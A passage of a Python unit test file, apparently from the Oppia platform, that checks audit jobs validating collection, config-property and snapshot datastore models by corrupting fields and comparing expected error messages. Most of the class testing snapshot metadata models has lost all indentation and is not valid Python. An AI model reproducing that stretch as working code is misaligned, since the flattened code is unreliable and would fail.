        self.rights_model_instance.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionCommitLogEntryModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_collection_model_failure(self):
        """Deleting collection '0' makes its two commit log entries fail
        the collection_ids external-reference check.
        """
        collection_models.CollectionModel.get_by_id('0').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_ids '
                'field check of CollectionCommitLogEntryModel\', '
                '[u"Entity id collection-0-1: based on field collection_ids '
                'having value 0, expect model CollectionModel with id 0 '
                'but it doesn\'t exist", u"Entity id collection-0-2: based '
                'on field collection_ids having value 0, expect model '
                'CollectionModel with id 0 but it doesn\'t exist"]]'
            ), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(
            self, expected_output, literal_eval=True)
    def test_missing_collection_rights_model_failure(self):
        """Deleting rights model '1' makes the hand-crafted rights entry
        fail the collection_rights_ids external-reference check.
        """
        collection_models.CollectionRightsModel.get_by_id('1').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_rights_ids '
                'field check of CollectionCommitLogEntryModel\', '
                '[u"Entity id rights-1-1: based on field '
                'collection_rights_ids having value 1, expect model '
                'CollectionRightsModel with id 1 but it doesn\'t exist"]]'
            ), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(
            self, expected_output, sort=True)
    def test_invalid_collection_version_in_model_id(self):
        """An entry id encoding version 3 for a version-1 collection
        fails the version check.
        """
        model_with_invalid_version_in_id = (
            collection_models.CollectionCommitLogEntryModel.create(
                '0', 3, self.owner_id, self.OWNER_USERNAME, 'edit',
                'msg', [{}],
                constants.ACTIVITY_STATUS_PUBLIC, False))
        model_with_invalid_version_in_id.collection_id = '0'
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for collection model '
                'version check of CollectionCommitLogEntryModel\', '
                '[u\'Entity id %s: Collection model corresponding '
                'to id 0 has a version 1 which is less than '
                'the version 3 in commit log entry model id\']]'
            ) % (model_with_invalid_version_in_id.id),
            u'[u\'fully-validated CollectionCommitLogEntryModel\', 4]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_id(self):
        """An id not matching the expected regex fails the id check; its
        unrecognized prefix also means no commit cmd domain object can be
        resolved for it.
        """
        model_with_invalid_id = (
            collection_models.CollectionCommitLogEntryModel(
                id='invalid-0-1', user_id=self.owner_id,
                username=self.OWNER_USERNAME, commit_type='edit',
                commit_message='msg', commit_cmds=[{}],
                post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
                post_commit_is_private=False))
        model_with_invalid_id.collection_id = '0'
        model_with_invalid_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for model id check of '
                'CollectionCommitLogEntryModel\', '
                '[u\'Entity id %s: Entity id does not match regex pattern\']]'
            ) % (model_with_invalid_id.id), (
                u'[u\'failed validation check for commit cmd check of '
                'CollectionCommitLogEntryModel\', [u\'Entity id invalid-0-1: '
                'No commit command domain object defined for entity with '
                'commands: [{}]\']]'),
            u'[u\'fully-validated CollectionCommitLogEntryModel\', 4]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_commit_type(self):
        """An unrecognized commit_type fails the commit type check."""
        self.model_instance_0.commit_type = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit type check of '
                'CollectionCommitLogEntryModel\', '
                '[u\'Entity id collection-0-1: Commit type invalid is '
                'not allowed\']]'
            ), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_post_commit_status(self):
        """An unrecognized post_commit_status fails its check."""
        self.model_instance_0.post_commit_status = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit status check '
                'of CollectionCommitLogEntryModel\', '
                '[u\'Entity id collection-0-1: Post commit status invalid '
                'is invalid\']]'
            ), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_true_post_commit_is_private(self):
        """post_commit_is_private must be False for a public status."""
        self.model_instance_0.post_commit_status = (
            feconf.POST_COMMIT_STATUS_PUBLIC)
        self.model_instance_0.post_commit_is_private = True
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit is private '
                'check of CollectionCommitLogEntryModel\', '
                '[u\'Entity id %s: Post commit status is '
                '%s but post_commit_is_private is True\']]'
            ) % (self.model_instance_0.id, feconf.POST_COMMIT_STATUS_PUBLIC),
            u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_false_post_commit_is_private(self):
        """post_commit_is_private must be True for a private status."""
        self.model_instance_0.post_commit_status = (
            feconf.POST_COMMIT_STATUS_PRIVATE)
        self.model_instance_0.post_commit_is_private = False
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit is private '
                'check of CollectionCommitLogEntryModel\', '
                '[u\'Entity id %s: Post commit status is '
                '%s but post_commit_is_private is False\']]'
            ) % (self.model_instance_0.id, feconf.POST_COMMIT_STATUS_PRIVATE),
            u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
    # NOTE(review): 'schmea' in the method name is a typo for 'schema';
    # kept as-is to preserve the existing test id.
    def test_model_with_invalid_commit_cmd_schmea(self):
        """Commit cmds violating their schemas (a missing required
        attribute and an extra attribute) each produce a per-command
        failure.
        """
        self.model_instance_0.commit_cmds = [{
            # Missing the required 'exploration_id' attribute.
            'cmd': 'add_collection_node'
        }, {
            # Missing 'exploration_id' and carrying an unexpected extra.
            'cmd': 'delete_collection_node',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'delete_collection_node check of '
                'CollectionCommitLogEntryModel\', '
                '[u"Entity id collection-0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'delete_collection_node\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following required attributes are missing: '
                'exploration_id, The following extra attributes '
                'are present: invalid_attribute"]]'
            ), (
                u'[u\'failed validation check for commit cmd '
                'add_collection_node check of CollectionCommitLogEntryModel\', '
                '[u"Entity id collection-0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'add_collection_node\'} '
                'failed with error: The following required attributes '
                'are missing: exploration_id"]]'),
            u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionSummaryModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the CollectionSummaryModel audit job."""

    def setUp(self):
        """Creates 6 explorations and 3 tagged collections with distinct
        roles: an editor on collection '0', a contributor who edits '0',
        and a viewer on collection '2'.
        """
        super(CollectionSummaryModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.owner = user_services.UserActionsInfo(self.owner_id)
        editor_email = 'user@editor.com'
        viewer_email = 'user@viewer.com'
        contributor_email = 'user@contributor.com'
        self.signup(editor_email, 'editor')
        self.signup(viewer_email, 'viewer')
        self.signup(contributor_email, 'contributor')
        self.editor_id = self.get_user_id_from_email(editor_email)
        self.viewer_id = self.get_user_id_from_email(viewer_email)
        self.contributor_id = self.get_user_id_from_email(contributor_email)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        language_codes = ['ar', 'en', 'en']
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
            language_code=language_codes[i]
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            # Collection i owns explorations 2i and 2i+1.
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            collection.tags = ['math', 'art']
            collection_services.save_new_collection(self.owner_id, collection)
        rights_manager.assign_role_for_collection(
            self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
        # The contributor's edit makes them appear in collection '0's
        # contributors summary.
        collection_services.update_collection(
            self.contributor_id, '0', [{
                'cmd': 'edit_collection_property',
                'property_name': 'title',
                'new_value': 'New title'
            }], 'Changes.')
        rights_manager.assign_role_for_collection(
            self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
        self.model_instance_0 = (
            collection_models.CollectionSummaryModel.get_by_id('0'))
        self.model_instance_0.put()
        self.model_instance_1 = (
            collection_models.CollectionSummaryModel.get_by_id('1'))
        self.model_instance_2 = (
            collection_models.CollectionSummaryModel.get_by_id('2'))
        self.job_class = (
            prod_validation_jobs_one_off.CollectionSummaryModelAuditOneOffJob)
    def test_standard_operation(self):
        """Publishing and updating keep all summaries fully validated."""
        rights_manager.publish_collection(self.owner, '0')
        collection_services.update_collection(
            self.owner_id, '1', [{
                'cmd': 'edit_collection_property',
                'property_name': 'title',
                'new_value': 'New title'
            }], 'Changes.')
        expected_output = [
            u'[u\'fully-validated CollectionSummaryModel\', 3]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated fails the time-relation
        check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of CollectionSummaryModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """A last_updated in the future (simulated by mocking datetime
        backwards 13 hours) fails the current-time check.
        """
        # Delete collections 1 and 2 so only summary 0 is reported.
        collection_services.delete_collection(self.owner_id, '1')
        collection_services.delete_collection(self.owner_id, '2')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionSummaryModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_collection_model_failure(self):
        """Deleting the backing CollectionModel makes the summary fail
        the collection_ids external-reference check.
        """
        collection_model = collection_models.CollectionModel.get_by_id('0')
        collection_model.delete(feconf.SYSTEM_COMMITTER_ID, '', [])
        # Keep the summary's timestamp consistent so only the missing
        # collection reference is reported.
        self.model_instance_0.collection_model_last_updated = (
            collection_model.last_updated)
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for collection_ids '
                'field check of CollectionSummaryModel\', '
                '[u"Entity id 0: based on field collection_ids having '
                'value 0, expect model CollectionModel with id 0 but '
                'it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_owner_user_model_failure(self):
        """A deleted owner's settings model fails the owner_user_ids
        check.
        """
        rights_manager.assign_role_for_collection(
            self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for owner_user_ids '
                'field check of CollectionSummaryModel\', '
                '[u"Entity id 0: based on field owner_user_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_editor_user_model_failure(self):
        """A deleted editor's settings model fails the editor_user_ids
        check.
        """
        user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for editor_user_ids '
                'field check of CollectionSummaryModel\', '
                '[u"Entity id 0: based on field editor_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.editor_id, self.editor_id),
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_viewer_user_model_failure(self):
        """A deleted viewer's settings model fails the viewer_user_ids
        check (on collection '2', where the viewer role was assigned).
        """
        user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for viewer_user_ids '
                'field check of CollectionSummaryModel\', '
                '[u"Entity id 2: based on field viewer_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.viewer_id, self.viewer_id),
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_contributor_user_model_failure(self):
        """A deleted contributor's settings model fails the
        contributor_user_ids check.
        """
        user_models.UserSettingsModel.get_by_id(self.contributor_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for contributor_user_ids '
                'field check of CollectionSummaryModel\', '
                '[u"Entity id 0: based on field contributor_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.contributor_id, self.contributor_id),
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_contributors_summary(self):
        """A contributors_summary whose keys disagree with the
        contributor ids fails the contributors summary check.
        """
        sorted_contributor_ids = sorted(
            self.model_instance_0.contributors_summary.keys())
        self.model_instance_0.contributors_summary = {'invalid': 1}
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for contributors summary '
                'check of CollectionSummaryModel\', '
                '[u"Entity id 0: Contributor ids: [u\'%s\', u\'%s\'] do '
                'not match the contributor ids obtained using '
                'contributors summary: [u\'invalid\']"]]'
            ) % (sorted_contributor_ids[0], sorted_contributor_ids[1]),
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_node_count(self):
        """A node_count disagreeing with the collection_contents dict
        (which has 2 nodes) fails the node count check.
        """
        self.model_instance_0.node_count = 10
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for node count check '
                'of CollectionSummaryModel\', '
                '[u"Entity id 0: Node count: 10 does not match the number '
                'of nodes in collection_contents dict: [{u\'exploration_id\': '
                'u\'0\'}, {u\'exploration_id\': u\'1\'}]"]]'
            ), u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_ratings(self):
        """Non-empty ratings fail validation; an empty dict (instance 1)
        is accepted.
        """
        self.model_instance_0.ratings = {'1': 0, '2': 1}
        self.model_instance_0.put()
        self.model_instance_1.ratings = {}
        self.model_instance_1.put()
        expected_output = [(
            u'[u\'failed validation check for ratings check of '
            'CollectionSummaryModel\', '
            '[u"Entity id 0: Expected ratings for the entity to be empty '
            'but received {u\'1\': 0, u\'2\': 1}"]]'
            ), u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_collection_related_property(self):
        """A summary title disagreeing with the collection's title fails
        the title field check.
        """
        self.model_instance_0.title = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for title field check of '
                'CollectionSummaryModel\', '
                '[u\'Entity id %s: title field in entity: invalid does not '
                'match corresponding collection title field: New title\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_collection_rights_related_property(self):
        """A summary status disagreeing with the rights model's status
        fails the status field check.
        """
        self.model_instance_0.status = 'public'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for status field check of '
                'CollectionSummaryModel\', '
                '[u\'Entity id %s: status field in entity: public does not '
                'match corresponding collection rights status field: '
                'private\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class ConfigPropertyModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the ConfigPropertyModel audit job."""

    def setUp(self):
        """Creates one config property; the 'oppia_csrf_secret' property
        is created automatically by the test framework.
        """
        super(ConfigPropertyModelValidatorTests, self).setUp()
        self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
        self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
        self.model_instance = config_models.ConfigPropertyModel(
            id='config_model', value='c')
        self.model_instance.commit(feconf.SYSTEM_COMMITTER_ID, [])
        self.csrf_model_instance = config_models.ConfigPropertyModel.get_by_id(
            'oppia_csrf_secret')
        self.job_class = (
            prod_validation_jobs_one_off.ConfigPropertyModelAuditOneOffJob)
    def test_standard_operation(self):
        """Both config properties validate cleanly."""
        expected_output = [
            u'[u\'fully-validated ConfigPropertyModel\', 2]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated fails the time-relation
        check.
        """
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.commit(self.admin_id, [])
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of ConfigPropertyModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance.id,
                    self.model_instance.created_on,
                    self.model_instance.last_updated
                ),
            u'[u\'fully-validated ConfigPropertyModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """A last_updated in the future (simulated by mocking datetime
        backwards 13 hours) fails the current-time check.
        """
        # Delete the csrf property so only the test property is reported.
        self.csrf_model_instance.delete(self.admin_id, '', [{}])
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ConfigPropertyModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_snapshot_metadata_model_failure(self):
        """A missing snapshot metadata model fails the
        snapshot_metadata_ids external-reference check.
        """
        config_models.ConfigPropertySnapshotMetadataModel.get_by_id(
            'config_model-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of ConfigPropertyModel\', '
                '[u"Entity id config_model: based on field '
                'snapshot_metadata_ids having '
                'value config_model-1, expect model '
                'ConfigPropertySnapshotMetadataModel '
                'with id config_model-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated ConfigPropertyModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_snapshot_content_model_failure(self):
        """A missing snapshot content model fails the
        snapshot_content_ids external-reference check.
        """
        config_models.ConfigPropertySnapshotContentModel.get_by_id(
            'config_model-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of ConfigPropertyModel\', '
                '[u"Entity id config_model: based on field '
                'snapshot_content_ids having '
                'value config_model-1, expect model '
                'ConfigPropertySnapshotContentModel '
                'with id config_model-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated ConfigPropertyModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
class ConfigPropertySnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(ConfigPropertySnapshotMetadataModelValidatorTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.config_model = config_models.ConfigPropertyModel(
id='config_model', value='c')
self.config_model.commit(self.admin_id, [])
user_models.UserSettingsModel(
id=feconf.SYSTEM_COMMITTER_ID, email='system@committer.com').put()
self.model_instance = (
config_models.ConfigPropertySnapshotMetadataModel.get_by_id(
'config_model-1'))
self.csrf_model_instance = (
config_models.ConfigPropertySnapshotMetadataModel.get_by_id(
'oppia_csrf_secret-1'))
self.job_class = (
prod_validation_jobs_one_off
.ConfigPropertySnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
self.config_model.commit(self.admin_id, [])
expected_output = [
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of ConfigPropertySnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id,
self.model_instance.created_on,
self.model_instance.last_updated),
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.csrf_model_instance.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ConfigPropertySnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_config_property_model_failure(self):
self.config_model.delete(self.admin_id, '', [])
expected_output = [
(
u'[u\'failed validation check for config_property_ids '
'field check of ConfigPropertySnapshotMetadataModel\', '
'[u"Entity id config_model-1: based on field '
'config_property_ids having value config_model, '
'expect model ConfigPropertyModel with '
'id config_model but it doesn\'t exist", '
'u"Entity id config_model-2: based on field '
'config_property_ids having value config_model, expect model '
'ConfigPropertyModel with id config_model but it doesn\'t '
'exist"]]'
),
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, literal_eval=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.admin_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of ConfigPropertySnapshotMetadataModel\', '
'[u"Entity id config_model-1: based on field committer_ids '
'having value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.admin_id, self.admin_id),
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_config_property_model_version_in_model_id(self):
model_with_invalid_version_in_id = (
config_models.ConfigPropertySnapshotMetadataModel(
id='config_model-3', committer_id=self.admin_id,
commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for config property model '
'version check of ConfigPropertySnapshotMetadataModel\', '
'[u\'Entity id config_model-3: ConfigProperty model '
'corresponding to id config_model has a version 1 '
'which is less than the version 3 in '
'snapshot metadata model id\']]'
),
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
    # NOTE(review): method name misspells 'schema' as 'schmea'; kept as-is
    # to avoid changing the test's discovered name.
    def test_model_with_invalid_commit_cmd_schmea(self):
        """A commit command that is missing required attributes and
        carries extra attributes fails commit-cmd schema validation.
        """
        # 'change_property_value' requires 'new_value' and does not allow
        # 'invalid_attribute'.
        self.model_instance.commit_cmds = [{
            'cmd': 'change_property_value',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'change_property_value check of '
                'ConfigPropertySnapshotMetadataModel\', '
                '[u"Entity id config_model-1: Commit command domain '
                'validation for command: {u\'cmd\': '
                'u\'change_property_value\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following required attributes are missing: '
                'new_value, The following extra attributes are present: '
                'invalid_attribute"]]'
            ), u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
class ConfigPropertySnapshotContentModelValidatorTests(
        test_utils.GenericTestBase):
    """Unit tests for the ConfigPropertySnapshotContentModel audit job."""

    def setUp(self):
        """Creates one config property (plus the oppia_csrf_secret that the
        base test class presumably commits) so two snapshot content models
        exist, and registers the audit job under test.
        """
        super(ConfigPropertySnapshotContentModelValidatorTests, self).setUp()
        self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
        self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
        self.config_model = config_models.ConfigPropertyModel(
            id='config_model', value='c')
        self.config_model.commit(self.admin_id, [])
        user_models.UserSettingsModel(
            id=feconf.SYSTEM_COMMITTER_ID, email='system@committer.com').put()
        self.model_instance = (
            config_models.ConfigPropertySnapshotContentModel.get_by_id(
                'config_model-1'))
        self.csrf_model_instance = (
            config_models.ConfigPropertySnapshotContentModel.get_by_id(
                'oppia_csrf_secret-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .ConfigPropertySnapshotContentModelAuditOneOffJob)

    def test_standard_operation(self):
        """All snapshot content models validate when nothing is broken."""
        self.config_model.commit(self.admin_id, [])
        expected_output = [
            u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time relation
        check.
        """
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of ConfigPropertySnapshotContentModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance.id,
                    self.model_instance.created_on,
                    self.model_instance.last_updated
                ),
            u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With a mocked clock, last_updated appears to be in the future
        and fails the current-time check.
        """
        # Remove the csrf model so only the target instance is reported.
        self.csrf_model_instance.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ConfigPropertySnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        # MockDatetime13Hours presumably shifts "now" ~13 hours into the
        # past, making last_updated look future-dated -- confirm against the
        # mock's definition earlier in this file.
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_config_property_model_failure(self):
        """Deleting the parent config property makes the
        config_property_ids field check fail for both snapshot content
        models.
        """
        self.config_model.delete(self.admin_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for config_property_ids '
                'field check of ConfigPropertySnapshotContentModel\', '
                '[u"Entity id config_model-1: based on field '
                'config_property_ids having value config_model, '
                'expect model ConfigPropertyModel with '
                'id config_model but it doesn\'t exist", '
                'u"Entity id config_model-2: based on field '
                'config_property_ids having value config_model, expect model '
                'ConfigPropertyModel with id config_model but it '
                'doesn\'t exist"]]'
            ),
            u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 1]']
        run_job_and_check_output(self, expected_output, literal_eval=True)

    def test_invalid_config_property_model_version_in_model_id(self):
        """A snapshot content model whose id encodes a version larger
        than the parent model's version fails the version check.
        """
        model_with_invalid_version_in_id = (
            config_models.ConfigPropertySnapshotContentModel(
                id='config_model-3'))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for config property model '
                'version check of ConfigPropertySnapshotContentModel\', '
                '[u\'Entity id config_model-3: ConfigProperty model '
                'corresponding to id config_model has a version 1 '
                'which is less than the version 3 in snapshot '
                'content model id\']]'
            ),
            u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class SentEmailModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for the SentEmailModel audit job."""

    def setUp(self):
        """Creates sender/recipient users and one sent email whose hash is
        stubbed to a fixed value so it can be retrieved deterministically.
        """
        super(SentEmailModelValidatorTests, self).setUp()

        def mock_generate_hash(
                unused_cls, unused_recipient_id, unused_email_subject,
                unused_email_body):
            # Fixed hash so the model can be fetched via get_by_hash below.
            return 'Email Hash'

        self.sender_email = 'sender@email.com'
        self.sender_id = 'sender'
        self.sender_model = user_models.UserSettingsModel(
            id=self.sender_id, email=self.sender_email)
        self.sender_model.put()

